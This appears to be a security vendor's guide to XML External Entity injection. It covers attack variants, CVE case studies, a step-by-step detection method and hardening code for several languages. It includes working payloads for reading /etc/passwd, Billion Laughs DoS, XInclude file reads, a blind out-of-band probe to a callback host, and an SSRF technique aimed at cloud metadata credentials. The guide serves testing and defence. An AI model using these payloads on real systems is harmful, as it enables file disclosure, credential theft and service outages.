XXE (CWE-611) exploits XML parsers that resolve external entities, enabling file disclosure, SSRF, and RCE in some configurations. One parser flag eliminates the attack class.
TL;DR
file:///etc/passwd (one parser flag eliminates this)
disallow-doctype-decl: true (Java) / defusedxml (Python) / DtdProcessing.Prohibit (.NET)
The XML specification includes a Document Type Definition (DTD) mechanism that allows XML documents to define named entities: shortcuts that the parser replaces with their defined value during processing. One variant, the external entity, instructs the parser to fetch content from an external URI and inline it into the document. XML External Entity Injection (XXE, CWE-611) occurs when an application parses attacker-controlled XML and a misconfigured parser resolves these external entity references without restriction.
The attack surface is broader than most engineers expect. Beyond traditional REST APIs with Content-Type: application/xml, XXE exists in SOAP services, SAML SSO flows, file upload endpoints accepting SVG and Office formats (DOCX/XLSX/ODT), PDF processors handling XFA forms, RSS/Atom feed parsers, and XML-RPC endpoints. Any code path that passes untrusted XML through an unprotected parser is an XXE entry point.
OWASP classified XXE under A05:2021 (Security Misconfiguration) rather than A03 (Injection) because the root cause is a parser misconfiguration, not a language-level injection flaw. The XML specification itself is not broken — parsers simply ship with external entity resolution enabled by default in many frameworks, and developers rarely explicitly disable it. CVE-2025-66516 (Apache Tika, CVSS 10.0) and CVE-2024-34102 (Adobe Commerce CosmicSting, CVSS 9.8, approximately 170,000 affected stores) demonstrate that XXE remains actively exploited at critical severity in 2025.
The attack exploits the XML parser's entity resolution step. When the parser encounters &entityname; in document content, it looks up the entity definition and substitutes the resolved value. For external entities defined with the SYSTEM keyword, the parser fetches the specified URI and uses its contents as the substitution value.
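The resolution step can be observed without reading any file. The following is a minimal sketch, assuming Python's stdlib expat bindings; the function name `requested_external_uris` and the sample payload are illustrative and not taken from any product. It registers a handler that records the system identifier the parser asks to resolve, then tells the parser to continue without opening anything.

```python
from xml.parsers import expat

# Illustrative payload: declares an external entity and references it once.
PAYLOAD = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<!DOCTYPE foo [\n'
    b'  <!ENTITY xxe SYSTEM "file:///etc/passwd">\n'
    b']>\n'
    b'<productSearch><query>&xxe;</query></productSearch>'
)


def requested_external_uris(xml_bytes: bytes) -> list:
    """Return the system identifiers the parser asks to resolve, without fetching them."""
    requested = []

    def on_external_entity(context, base, system_id, public_id):
        requested.append(system_id)
        return 1  # non-zero tells expat to continue; nothing is opened or read

    parser = expat.ParserCreate()
    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(xml_bytes, True)
    return requested


print(requested_external_uris(PAYLOAD))
```

A vulnerable parser differs from this sketch only in what its handler does: instead of recording the URI, it opens it and feeds the content back into the document.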
The exploit chain proceeds in five steps:
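1. The attacker submits XML containing a <!DOCTYPE> declaration defining an external entity: <!ENTITY xxe SYSTEM "file:///etc/passwd">.
2. The parser processes the DTD and registers the entity definition.
3. When the parser encounters &xxe; in the document body, it fetches file:///etc/passwd from the local filesystem.
4. The parser substitutes the file contents for the entity reference.
5. The application reflects the parsed value in its response.
A minimal exploitation example: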
POST /api/products HTTP/1.1
Host: shop.example.com
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<productSearch>
<query>&xxe;</query>
</productSearch>

HTTP/1.1 200 OK
Content-Type: application/json

{"results": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n..."}
The entity value replaces &xxe; in the <query> element, and the application reflects the parsed value in its response.
| Variant | Technique | Impact | Blind? |
|---|---|---|---|
| Classic file disclosure | SYSTEM "file:///etc/passwd" reflected in response | Local file read | No |
| SSRF via XXE | SYSTEM "http://169.254.169.254/..." | Internal network access, cloud metadata theft | Sometimes |
| Blind OOB | Two-stage parameter entity + external DTD | File exfiltration via DNS/HTTP callback | Yes |
| Error-based local DTD | Local DTD reuse, file content in error message | File read without OOB infrastructure | No (error channel) |
| XInclude injection | xi:include href="file:///etc/passwd" — no DOCTYPE needed | File read, bypasses DOCTYPE filters | No |
| SVG upload XXE | Malicious SVG processed by Batik/ImageMagick | Server file read via avatar/image upload | Sometimes |
| DOCX/XLSX XXE | XML files inside OOXML ZIP archive | Server file read when document is parsed | Sometimes |
| SAML XXE | XXE in SAML AuthnRequest or metadata | Auth bypass, credentials disclosure | Sometimes |
| Billion Laughs DoS | Recursive entity expansion (10^9 expansions) | Memory exhaustion, service crash | No |
Classic in-band XXE is the simplest form: the entity resolves a file:// URI and the content appears directly in the HTTP response. Any file readable by the application process user is accessible — /etc/passwd, application configuration files, private keys, database credentials.
SSRF via XXE pivots the parser as an HTTP client. Replacing file:// with http:// causes the parser to issue outbound HTTP requests. Against cloud instances, http://169.254.169.254/latest/meta-data/iam/security-credentials/ returns AWS IAM credentials without authentication. Internal services unreachable from the internet are reachable through the XML parser's outbound connection.
Blind OOB XXE applies when the server parses XML but does not return entity content in the HTTP response. Parameter entities make the server fetch an attacker-hosted DTD, which instructs the parser to exfiltrate file content to a second OOB endpoint. BreachVex uses unique out-of-band callback tokens per probe to correlate callbacks with specific payloads.
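Per-probe callback tokens can be sketched in a few lines. This is an illustration only, not BreachVex's implementation: `OAST_DOMAIN`, `new_probe`, and `correlate` are hypothetical names, and the domain is a placeholder rather than a real callback service.

```python
import secrets

OAST_DOMAIN = "oast.example"  # hypothetical callback domain, not a real service


def new_probe(registry: dict, endpoint: str, variant: str) -> str:
    """Register a probe and return the unique callback hostname to embed in its payload."""
    token = secrets.token_hex(8)
    registry[token] = {"endpoint": endpoint, "variant": variant}
    return f"{token}.{OAST_DOMAIN}"


def correlate(registry: dict, callback_host: str):
    """Map an observed callback hostname back to the probe that caused it, or None."""
    host = callback_host.lower().rstrip(".")
    suffix = "." + OAST_DOMAIN
    if not host.endswith(suffix):
        return None
    # The token is the label directly in front of the callback domain.
    token = host[: -len(suffix)].split(".")[-1]
    return registry.get(token)


registry = {}
host = new_probe(registry, "/api/products", "blind-oob")
print(correlate(registry, host))
```

Because each token is random and used once, a callback arriving hours later can still be attributed to the exact endpoint and payload variant that triggered it.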
Error-based local DTD reuse is preferred when OOB infrastructure is unavailable. It references a DTD file that already exists on the target server, redefines a parameter entity within it, and crafts a chain triggering a parse error that contains the target file's contents. Linux systems commonly have /usr/share/yelp/dtd/docbookx.dtd; Windows systems have C:\Windows\System32\wbem\xml\CIM_DTD_V20.dtd.
XInclude injection bypasses defenses that block <!DOCTYPE patterns. XInclude uses namespace-qualified elements (xmlns:xi="http://www.w3.org/2001/XInclude") instead of DOCTYPE declarations. Disabling entity processing does not disable XInclude processing — both must be configured independently.
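Because XInclude is identified by its namespace rather than by a DOCTYPE, a filter has to look for the namespace-qualified element itself. The sketch below assumes Python's stdlib ElementTree, which parses `xi:include` as an ordinary element and does not perform the inclusion on its own; `find_xinclude_targets` is an illustrative name.

```python
import xml.etree.ElementTree as ET

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


def find_xinclude_targets(xml_text: str) -> list:
    """Return the href of every XInclude element in the document, whatever prefix it uses."""
    root = ET.fromstring(xml_text)
    include_tag = f"{{{XINCLUDE_NS}}}include"
    return [element.get("href") for element in root.iter(include_tag)]


sample = (
    '<root xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/>'
    "</root>"
)
print(find_xinclude_targets(sample))
```

Matching on the namespace URI rather than the literal `xi:` prefix matters, since an attacker is free to bind the namespace to any prefix.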
Billion Laughs DoS exploits recursive internal entity expansion to exhaust parser memory and CPU. No external network access or file:// URI is needed — the attack is self-contained within the DTD:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>
Four levels of expansion produce 1,000 "lol" strings; ten levels produce 10^9 (a billion), exhausting memory and CPU before the document finishes parsing. defusedxml blocks this by default; lxml relies on huge_tree=False (its default), which keeps libxml2's built-in expansion limits active; Java requires setFeature("http://javax.xml.XMLConstants/feature/secure-processing", true).
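The growth rate is easy to check. The sketch below parses the small document above with Python's stdlib ElementTree (safe at this size, since the result is only a few kilobytes) and projects the size of deeper nestings arithmetically instead of expanding them. `expanded_copies` is an illustrative helper that counts the base entity as level one.

```python
import xml.etree.ElementTree as ET

FOUR_LEVELS = """<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>"""


def expanded_copies(levels: int, fanout: int = 10) -> int:
    """Copies of the base string after `levels` entity definitions (base entity = level 1)."""
    return fanout ** (levels - 1)


# Measure the real expansion for the small document.
expanded_text = ET.fromstring(FOUR_LEVELS).text
measured = expanded_text.count("lol")

# Project deeper nestings without ever expanding them.
for levels in (4, 7, 10):
    copies = expanded_copies(levels)
    print(levels, copies, f"{copies * len('lol'):,} bytes")
```

Each added level multiplies the output by the fan-out, which is why a payload of well under a kilobyte can demand gigabytes of memory.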
CVE-2024-34102 — Adobe Commerce CosmicSting (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
The most widely exploited XXE vulnerability of 2024. Adobe Commerce's REST API accepted XML bodies without disabling external entity resolution. Sansec researchers demonstrated a five-step RCE chain: XXE reads app/etc/env.php → extracts crypt/key → forges admin JWT → admin REST API → code-on-demand RCE. Approximately 170,000 unpatched stores were vulnerable. Within 72 hours of public disclosure, threat actors compromised more than 4,275 e-commerce stores. The attack required no authentication and no user interaction. CVE-2024-34102 was presented at Black Hat USA 2024 and remains the canonical example of XXE chaining to full system compromise.
CVE-2025-66516 — Apache Tika PDF/XFA (CVSS 10.0)
Apache Tika is the most widely used server-side content extraction library, powering document ingestion in enterprise search, RAG pipelines, and file processing services. Versions before 3.2.2 processed XFA (XML Forms Architecture) content inside PDF documents without disabling external entity resolution. Any application using Tika to process attacker-supplied PDFs is vulnerable — including AI document ingestion pipelines, which represent a new high-value attack surface. Upgrade to Apache Tika 3.2.2 or later.
CVE-2024-22024 — Ivanti Connect Secure SAML (CVSS 8.3)
Ivanti's VPN product processed SAML AuthnRequests at /dana-na/auth/saml-sso.cgi without disabling external entity resolution. The same product was simultaneously vulnerable to CVE-2023-46805 (authentication bypass) — chained, these two CVEs enabled unauthenticated RCE against thousands of enterprise VPN concentrators deployed globally.
CVE-2024-45409 — ruby-saml (CVSS 10.0)
GitHub Security Lab discovered that ruby-saml (used by GitLab and thousands of Ruby applications) was vulnerable to SAML assertion forgery via XML parser differential. Nokogiri (signature verification) and REXML (claim extraction) parse the same XML document differently. An attacker crafts a document passing Nokogiri signature verification but presenting forged claims to REXML — achieving authentication bypass with no traditional injection in the document. CVE-2025-25292 is a second variant of the same differential, published in 2025.
HackerOne #1113539 — Rockstar Games XLSX Import (High)
An Excel import feature on the Rockstar Games web portal processed .xlsx files server-side. The attacker modified the XML files inside the OOXML ZIP archive to inject XXE payloads. When uploaded and processed, the server made OOB callbacks confirming XXE, then disclosed server-side file contents via in-band payloads.
HackerOne #409370 — Shopify SAML XXE (Critical)
Shopify's SAML SSO authentication flow parsed XML assertions without disabling external entity resolution. The attacker provided a crafted SAML response with an OOB XXE payload, which triggered file read callbacks from Shopify's application servers.
CosmicSting (CVE-2024-34102) pattern: XXE does not need to directly return file contents to cause critical impact. The RCE chain reads a configuration file, extracts a cryptographic key, and forges admin authentication tokens, turning a file-read primitive into full system compromise with no user interaction required. Always assess the full impact chain, not just the file read primitive.
Identify all XML entry points: REST APIs with Content-Type: application/xml, SOAP services (/ws/, /soap/, /services/), SAML SSO endpoints, file upload flows accepting SVG/DOCX/XLSX/ODT/PDF, RSS/Atom feeds, and XML-RPC.
Send a baseline probe to confirm XML acceptance:
<?xml version="1.0" encoding="UTF-8"?>
<root><data>test</data></root>
A 415 Unsupported Media Type response means XML is rejected. Any other status indicates the endpoint processes XML.
Test entity expansion with an in-band canary:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY test "XXECANARY123">]>
<root><data>&test;</data></root>
If XXECANARY123 appears in the response, entity expansion is active.
Attempt SYSTEM entity file read:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><data>&xxe;</data></root>
File contents in the response confirm classic in-band XXE.
For blind contexts, use Interactsh or Burp Collaborator:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://YOUR-TOKEN.oast.pro/probe"> %xxe;]>
<root/>
Test XInclude independently:
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>
Burp Suite Pro's active scanner includes XXE checks that use Burp Collaborator for OOB detection across XML endpoints, SOAP services, and file upload flows.
XXEinjector (Ruby) automates in-band and OOB XXE testing with payloads for multiple content types and file formats.
Nuclei templates (vulnerabilities/xxe/) include CVE-specific XXE templates. Custom templates can target application-specific XML endpoints.
Semgrep static rules python.lang.security.audit.xml-dtd and java.lang.security.audit.xxe flag unsafe parser configurations before deployment.
BreachVex detects XXE through a staged sequence of complementary checks: XML acceptance, entity-expansion canary, SYSTEM-entity file read, out-of-band callback correlation, and error-based local-DTD probing on known OS paths. Lower-signal results (DNS-only callbacks) are flagged for review, while data-exfiltration evidence is auto-reported.
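The in-band part of a staged sequence (XML acceptance, entity-expansion canary, SYSTEM-entity file read) can be sketched as a pure function over the three probe responses. This is an illustration under stated assumptions, not BreachVex's logic: the result labels, the `classify_in_band` name, and the /etc/passwd pattern are all hypothetical choices.

```python
import re

CANARY = "XXECANARY123"
# Typical first line of /etc/passwd, e.g. "root:x:0:0:root:/root:/bin/bash".
PASSWD_LINE = re.compile(r"root:[^:\s]*:0:0:")


def classify_in_band(baseline_status: int, canary_body: str, system_body: str) -> str:
    """Classify one endpoint from the responses to the three in-band probes."""
    if baseline_status == 415:
        return "xml-rejected"            # endpoint refuses XML outright
    if PASSWD_LINE.search(system_body):
        return "in-band-xxe"             # file contents came back in the response
    if CANARY in canary_body:
        return "entity-expansion-active"  # internal entities expand; external ones unproven
    return "no-in-band-signal"           # continue with blind and XInclude checks


print(classify_in_band(
    200,
    '{"results": "XXECANARY123"}',
    '{"results": "root:x:0:0:root:/root:/bin/bash"}',
))
```

One caveat for the canary check: an endpoint that echoes the raw request body would also return the canary string, so a match is a reason to continue testing rather than proof of expansion.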
Disabling external entity processing at the parser level eliminates classic XXE, blind OOB XXE, error-based XXE, and Billion Laughs DoS with a single configuration change. XInclude must be disabled separately.
// VULNERABLE — default DocumentBuilderFactory resolves external entities
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(inputStream); // XXE possible
// SAFE — disable DOCTYPE entirely (blocks all XXE + DoS vectors)
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false); // also disables XInclude
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(inputStream); // XXE blocked
# NOTE: xml.etree.ElementTree does not resolve external entities; it raises
# ParseError when a document references one, so it is safe for XXE. It is still
# exposed to Billion Laughs DoS via nested internal entity expansion.
# Use defusedxml for belt-and-suspenders protection against both XXE and DoS.
import xml.etree.ElementTree as ET
tree = ET.parse(untrusted_xml) # safe for XXE; vulnerable to Billion Laughs DoS
# SAFE — defusedxml blocks all XXE patterns AND Billion Laughs DoS
from defusedxml import ElementTree as ET
tree = ET.parse(untrusted_xml) # all XXE patterns blocked by default
# SAFE — lxml with explicit hardening
from lxml import etree
parser = etree.XMLParser(
resolve_entities=False,
no_network=True,
load_dtd=False,
huge_tree=False, # blocks Billion Laughs DoS
)
tree = etree.fromstring(xml_bytes, parser=parser)
// VULNERABLE (.NET 4.5.2 and earlier): XmlResolver defaults to XmlUrlResolver
var doc = new XmlDocument();
doc.Load(inputStream); // XXE possible on older .NET
// SAFE — explicitly null the resolver
var doc = new XmlDocument { XmlResolver = null };
doc.Load(inputStream); // blocks external entity resolution
// SAFE — XmlReader with DTD prohibition (preferred for streaming)
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Prohibit,
XmlResolver = null,
MaxCharactersFromEntities = 1024 // caps entity expansion (0 would mean no limit)
};
using var reader = XmlReader.Create(inputStream, settings);
// VULNERABLE: LIBXML_NOENT enables entity substitution
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NOENT); // LIBXML_NOENT is dangerous
// SAFE — LIBXML_NONET blocks network entities (does not block file://)
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NONET);
// SAFE (PHP < 8.0) — disable external entity loading globally
libxml_disable_entity_loader(true);
$dom = new DOMDocument();
$dom->loadXML($xml);
// PHP 8.0+: external entity loading is disabled by default for DOMDocument
// but SimpleXML and XMLReader still require explicit LIBXML_NONET flag
// fast-xml-parser: 15M+ weekly downloads, the most common Node.js XML library
// VULNERABLE — older default config may process entities
const { XMLParser } = require('fast-xml-parser');
const parser = new XMLParser();
const result = parser.parse(xmlString);
// SAFE — disable entity processing explicitly (fast-xml-parser >= 4.2.0)
const { XMLParser } = require('fast-xml-parser');
const parser = new XMLParser({
processEntities: false, // disables entity substitution
htmlEntities: false, // disables HTML entity processing
});
const result = parser.parse(xmlString);
Egress filtering as defense-in-depth: Restricting outbound connections from XML-processing services blocks OOB data exfiltration for blind XXE and SSRF pivots. This does not prevent file:// reads, but it removes the attacker's ability to receive exfiltrated data via DNS/HTTP callbacks. A WAF such as ModSecurity with the OWASP Core Rule Set can add detection for XML attack patterns. Neither control replaces parser hardening; both add depth.
XXE injection occurs when an XML parser resolves external entity references embedded in attacker-controlled input. The XML DTD specification allows entities that reference external URIs — when the parser fetches those URIs, it enables file read (file:///etc/passwd), SSRF (http://internal-service/), and in some configurations RCE. CWE-611 classifies this as Improper Restriction of XML External Entity Reference. OWASP absorbed XXE into A05:2021 (Security Misconfiguration) because vulnerable parsers almost always ship misconfigured, not broken.
XXE and SSRF are distinct vulnerability classes that chain together. XXE is an XML parsing flaw that forces the server to resolve an external entity pointing to any URI scheme (file://, http://, ftp://, gopher://). When that URI points to an internal service, the XXE becomes a SSRF pivot — the XML parser acts as the HTTP client. SSRF can also occur independently without any XML involvement. XXE-to-SSRF is a chain, not a synonym.
XXE is classified under OWASP Top 10 A05:2021 — Security Misconfiguration. Prior to the 2021 update, XXE had its own category (A04:2017). The reclassification reflects that XXE is not a design flaw in the XML specification itself, but a configuration failure — parsers ship with external entity resolution enabled by default in many frameworks, and developers fail to disable it.
Parsers that are vulnerable by default or when misconfigured include Java's DocumentBuilderFactory and SAXParserFactory (pre-Java 17 defaults), PHP's DOMDocument when using the LIBXML_NOENT flag, Node.js libxmljs2 without explicit noent:false, .NET XmlDocument with XmlResolver not set to null, and Ruby's Nokogiri with the noent option. Python's stdlib xml.etree and xml.minidom do not resolve external entities but remain exposed to Billion Laughs DoS. Safe alternatives: Java (disable DOCTYPE), Python (defusedxml), PHP (LIBXML_NONET without LIBXML_NOENT), .NET (XmlReaderSettings with DtdProcessing.Prohibit).
XXE can chain to RCE through several paths: (1) CosmicSting (CVE-2024-34102) — XXE reads app/etc/env.php, extracts crypt key, forges admin JWT, then code-on-demand RCE; (2) XSLT extension functions — PHP XSL with registerPHPFunctions() allows XSLT to call arbitrary PHP functions including system(); (3) SAML XXE reads Kerberos keytab for offline cracking to AD admin; (4) XXE reads database credentials for application-layer privilege escalation. Direct RCE from XXE alone is rare — it usually requires a vulnerable application logic chain.
Blind OOB (Out-of-Band) XXE occurs when the XML parser resolves external entities but the server does not return entity content in the HTTP response. Attackers use two-stage parameter entity chains: the target server fetches an attacker-hosted DTD, which instructs the parser to exfiltrate file content to a second OAST callback URL. Tools like Interactsh (oast.pro) or Burp Collaborator capture the DNS and HTTP callbacks. A DNS-only callback is rated POTENTIAL (confidence 0.30); an HTTP callback carrying data is rated CONFIRMED (0.98).
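The two confidence levels quoted above can be expressed as a small triage function. This is a sketch only: the `Callback` type, the `triage` name, and the `UNSCORED` fallback for cases the text does not rate (no callback at all, or an HTTP callback without data) are assumptions made for illustration.

```python
from dataclasses import dataclass


@dataclass
class Callback:
    protocol: str        # "dns" or "http"
    carried_data: bool   # True when the request included exfiltrated content


def triage(callbacks: list) -> tuple:
    """Return (label, confidence) for the callbacks attributed to a single probe."""
    if any(c.protocol == "http" and c.carried_data for c in callbacks):
        return ("CONFIRMED", 0.98)
    if callbacks and all(c.protocol == "dns" for c in callbacks):
        return ("POTENTIAL", 0.30)
    # Not rated by the text: no callback, or HTTP without data (assumed fallback).
    return ("UNSCORED", 0.0)


print(triage([Callback("dns", False)]))
print(triage([Callback("dns", False), Callback("http", True)]))
```

A DNS lookup alone shows only that something resolved the hostname, which can be a resolver, a proxy, or a security appliance; exfiltrated content in an HTTP request is much harder to explain any other way.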
Error-based local DTD reuse is an XXE technique that requires no external OOB infrastructure. It references a DTD file already on the target server filesystem (e.g., /usr/share/yelp/dtd/docbookx.dtd on Linux), redefines a parameter entity from that DTD, and crafts a chain that causes the parser to include file content in an error message. This technique is valuable in environments with strict egress filtering blocking OOB callbacks.
1. Send a benign XML probe. If the response is not 415, XML is accepted.
2. Inject a local entity canary: <!DOCTYPE foo [<!ENTITY test 'XXECANARY'>]><root>&test;</root>. If XXECANARY appears in the response, entity expansion is active.
3. Test a SYSTEM entity with file:///etc/passwd as the entity value. File contents in the response confirm classic XXE.
4. For blind contexts, use an Interactsh URL as the entity value and monitor for DNS/HTTP callbacks.
5. Test XInclude separately with an xi:include element.
XInclude is a W3C standard for XML document composition that allows including external files using xi:include elements — without requiring a DOCTYPE declaration. An attacker who can inject XML content can use XInclude to read files, bypassing defenses that block DOCTYPE-based XXE. XInclude must be explicitly disabled via setXIncludeAware(false) in Java — disabling DOCTYPE alone is insufficient.
File upload XXE occurs when an application accepts XML-based file formats (SVG, DOCX, XLSX, ODT, PDF with XFA) and processes them server-side. SVG files are processed by Apache Batik. DOCX/XLSX files contain XML inside OOXML ZIP archives processed by Apache POI or openpyxl. PDF with XFA forms is processed by Apache Tika (CVE-2025-66516, CVSS 10.0). The attack requires no modification of HTTP headers — only the file content matters.
Disable DOCTYPE processing entirely at the parser level. In Java JAXP: setFeature('http://apache.org/xml/features/disallow-doctype-decl', true). In Python: use defusedxml instead of stdlib xml modules — it blocks all XXE patterns by default. In .NET: set DtdProcessing = DtdProcessing.Prohibit and XmlResolver = null. In PHP: never pass LIBXML_NOENT; use LIBXML_NONET. This single configuration change eliminates classic XXE, blind OOB XXE, error-based XXE, and Billion Laughs DoS simultaneously. XInclude must be disabled separately.
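Where adding defusedxml is not an option, the same "no DOCTYPE at all" policy can be approximated with Python's stdlib alone. The following is a hedged two-pass sketch, not a replacement for a maintained library: `parse_untrusted` and `DoctypeForbidden` are illustrative names. The first pass uses expat only to detect a DOCTYPE and aborts as soon as one starts, before any entity is declared or expanded; the second pass builds the tree.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Parse XML only if it carries no DOCTYPE declaration."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_bytes, True)  # raises DoctypeForbidden, or ExpatError if malformed
    return ET.fromstring(xml_bytes)


print(parse_untrusted(b"<root><data>test</data></root>").findtext("data"))
try:
    parse_untrusted(b'<!DOCTYPE foo [<!ENTITY test "XXECANARY123">]><root>&test;</root>')
except DoctypeForbidden as exc:
    print("rejected:", exc)
```

Rejecting the declaration outright, instead of trying to neutralize individual entity types, is what lets one rule cover in-band, blind, error-based, and entity-expansion variants together.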
Notable XXE-related CVEs, ordered by CVSS severity: CVE-2025-66516 (Apache Tika PDF/XFA, CVSS 10.0), CVE-2024-45409 (ruby-saml SAML bypass, CVSS 10.0), CVE-2024-34102 (Adobe Commerce CosmicSting, CVSS 9.8; the most exploited XXE of 2024, with approximately 170,000 affected stores), CVE-2025-49493 (Akamai CloudTest SOAP, CVSS 9.1), CVE-2024-22024 (Ivanti Connect Secure SAML, CVSS 8.3), CVE-2025-13096 (IBM BAW, CVSS 8.2), CVE-2024-30043 (SharePoint, CVSS 6.5).
Migrating an API from XML to JSON eliminates XXE at the architecture level, because JSON parsers do not implement the DTD/entity system that enables XXE. However, XML cannot be avoided in SAML assertions, Office document formats (DOCX/XLSX), SVG images, RSS/Atom feeds, SOAP services, and enterprise integration protocols. For those contexts, parser hardening is mandatory.